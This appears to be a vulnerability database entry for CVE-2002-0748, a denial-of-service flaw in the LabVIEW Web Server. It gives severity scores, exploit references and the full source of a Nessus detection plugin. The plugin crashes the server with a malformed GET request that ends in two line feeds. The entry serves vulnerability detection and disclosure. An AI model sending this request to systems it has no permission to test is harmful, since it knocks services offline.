Vulnerabilities > CVE-2002-0748 - Denial of Service vulnerability in National Instruments Labview 5.1.1/6.0/6.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
national-instruments
nessus
exploit available

Summary

LabVIEW Web Server 5.1.1 through 6.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request that ends in two newline characters, instead of the expected carriage return/newline combinations.

Exploit-Db

descriptionNational Instruments LabVIEW 5.1.1/6.0/6.1 HTTP Request Denial of Service Vulnerability. CVE-2002-0748. Dos exploits for multiple platform
idEDB-ID:21413
last seen2016-02-02
modified2002-04-19
published2002-04-19
reporterSteve Zins
sourcehttps://www.exploit-db.com/download/21413/
titleNational Instruments LabVIEW 5.1.1/6.0/6.1 HTTP Request Denial of Service Vulnerability

Nessus

NASL familyWeb Servers
NASL idLABVIEW_WWW_DOS.NASL
descriptionIt was possible to kill the web server by sending a request that ends with two LF characters instead of the normal sequence CR LF CR LF (CR = carriage return, LF = line feed). An attacker can exploit this vulnerability to make this server and all LabView applications crash.
last seen2020-06-01
modified2020-06-02
plugin id11063
published2002-08-06
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11063
titleLabVIEW Web Server HTTP Get Newline DoS
code
#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security 
#      Erik Anderson <[email protected]>
#      Added BugtraqID and CAN
#
# References:
# From: "Steve Zins" <[email protected]>
# To: [email protected]
# Subject: LabVIEW Web Server DoS Vulnerability
# Date: Mon, 22 Apr 2002 22:51:39 -0700
#


include("compat.inc");

if(description)
{
 script_id(11063);
 script_version ("1.28");

 script_cve_id("CVE-2002-0748");
 script_bugtraq_id(4577);

 script_name(english:"LabVIEW Web Server HTTP Get Newline DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to a denial of service attack." );
 script_set_attribute(attribute:"description", value:
"It was possible to kill the web server by sending a request that ends
with two LF characters instead of the normal sequence CR LF CR LF (CR
= carriage return, LF = line feed). 

An attacker can exploit this vulnerability to make this server and all
LabView applications crash." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Apr/334" );
 script_set_attribute(attribute:"solution", value:
"Upgrade your LabView software or run the web server with logging
disabled." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/06");
 script_set_attribute(attribute:"vuln_publication_date", value: "2002/04/19");
 script_cvs_date("Date: 2018/11/15 20:50:25");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"Kills the LabView web server");
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");
 script_require_ports("Services/www", 80);
 script_dependencies("find_service1.nasl", "http_version.nasl");
 exit(0);
}

########

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if (http_is_dead(port: port)) exit(0);

w = http_send_recv_buf(port: port, data: 'GET / HTTP/1.0\n\n');
sleep(1);

if (http_is_dead(port: port, retry: 3)) security_warning(port);